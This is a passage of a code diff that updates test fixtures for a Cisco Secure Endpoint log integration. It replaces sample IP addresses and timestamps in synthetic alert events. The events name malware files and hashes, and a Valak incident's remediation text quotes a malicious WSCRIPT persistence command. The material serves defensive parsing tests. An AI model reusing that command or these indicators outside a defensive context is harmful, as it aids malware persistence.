"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -3945,7 +3945,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -3973,7 +3973,7 @@ "Demo_AMP_Intel" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3983,8 +3983,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322524139Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", + "ingested": "2021-12-09T13:35:29.222651900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "code": "554696715", "kind": "alert", "action": "Scan Completed, No Detections", @@ -4009,7 +4009,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -4037,7 +4037,7 @@ "Demo_AMP_Intel" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4047,8 +4047,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322526324Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", + "ingested": "2021-12-09T13:35:29.222675100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "code": "554696714", "kind": "alert", "action": "Scan Started", @@ -4068,7 +4068,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log index ae6c21d78ff..35b4789fba9 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log @@ -1,42 +1,42 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud 